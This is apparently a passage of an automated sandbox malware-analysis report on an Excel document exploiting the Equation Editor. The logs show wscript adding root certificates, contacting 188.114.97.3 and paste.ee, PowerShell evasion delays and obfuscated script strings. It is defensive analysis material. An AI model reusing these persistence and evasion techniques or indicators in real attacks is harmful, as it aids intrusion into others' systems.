    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_002C25E1 push ebx; retf 8_2_002C25EA

    Persistence and Installation Behavior

    barindex
    Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 598565Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 767Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1596Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1454Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4395Jump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3640Thread sleep time: -240000s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exe TID: 3800Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3928Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3860Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3968Thread sleep count: 1454 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3968Thread sleep count: 4395 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4000Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4012Thread sleep time: -2767011611056431s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4012Thread sleep time: -598565s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4012Thread sleep time: -600000s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4012Thread sleep time: -600000s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 598565Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
    Source: wscript.exe, 00000005.00000003.480186545.0000000004140000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: zuJKtcLKNoqmfULqzKpLKfKnicxWLLKioGLkWBWZOgGlGxGnvmcixidKLfiCnrpkamhv = "WBiRetsuUfLPhLoicKCLWLGxKknAvicmiGneJkKNZpWALfppkBCOROhWizRzUJdkmRbr"
    Source: wscript.exe, 00000005.00000003.480186545.0000000004140000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: zuJKtcLKNoqmfULqzKpLKfKnicxWLLKioGLkWBWZOgGlGxGnvmcixidKLfiCnrpkamhv
    Source: wscript.exe, 00000005.00000002.482745286.0000000002B3D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PkvmciTSKPjUibhsznmkzbkxmWLkLkObzWoWQIindLUCOOLJmeWuRaPdRjQkmWmgpKPqcef2
    Source: wscript.exe, 00000005.00000003.478911110.0000000002B54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DvmciTSKPjUibhsznmkzbkxmWLkLkObzWoWQIindLUCOOLJmeWuRaPdRjQkmWmgpKPqce
    Source: wscript.exe, 00000005.00000003.478871785.0000000002B84000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IAOaKaegWgsWqcdLtIiheCAGiKGziCGeLOfWLRNkmmPsvcfUzpRLfsajariacmjkGLkOuNxWGo
    Source: wscript.exe, 00000005.00000003.478815646.0000000002DD7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AOaKaegWgsWqcdLtIiheCAGiKGziCGeLOfWLRNkmmPsvcfUzpRLfsajaria
    Source: wscript.exe, 00000005.00000002.482745286.0000000002B3D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +AOaKaegWgsWqcdLtIiheCAGiKGziCGeLOfWLRNkmmPsvcfUzpRLfsajariacmjkGLkOuNxWGo2
    Source: wscript.exe, 00000005.00000003.480186545.0000000004140000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmciTSKPjUibhsznmkzbkxmWLkLkObzWoWQIindLUCOOLJmeWuRaPdRjQkmWmgpKPqce = "nBdpKNTGpcOGfQqUkUeeLRoLGrWBWfZmKupRcZWLWiKdNbbRhcBUPioIfWZAhWGChWuk"
    Source: wscript.exe, 00000005.00000003.480186545.0000000004140000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AOaKaegWgsWqcdLtIiheCAGiKGziCGeLOfWLRNkmmPsvcfUzpRLfsajariacmjkGLkOuNxWGo = "WKhrAiirgWWqKeLiBipUeLKckbdUHPNmGeGihNoLWmPSmIjPKBfQAiBLpTLWWgUWBcfz"
    Source: wscript.exe, 00000005.00000003.478851848.0000000002BBD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DzuJKtcLKNoqmfULqzKpLKfKnicxWLLKioGLkWBWZOgGlGxGnvmcixidKLfiCnrpkamhv
    Source: wscript.exe, 00000005.00000003.480186545.0000000004140000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmciTSKPjUibhsznmkzbkxmWLkLkObzWoWQIindLUCOOLJmeWuRaPdRjQkmWmgpKPqce*,=^
    Source: wscript.exe, 00000005.00000003.480186545.0000000004140000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AOaKaegWgsWqcdLtIiheCAGiKGziCGeLOfWLRNkmmPsvcfUzpRLfsajariacmjkGLkOuNxWGo
    Source: wscript.exe, 00000005.00000003.478807753.0000000002DC9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AOaKaegWgsWqcdLtIiheCAGiKGziCGeLOfWLRNkmmPsvcfUzpRLfsajariaA
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036605E2 mov edx, dword ptr fs:[00000030h]2_2_036605E2
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 188.114.97.3 443Jump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeDomain query: paste.ee
    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3932, type: MEMORYSTR
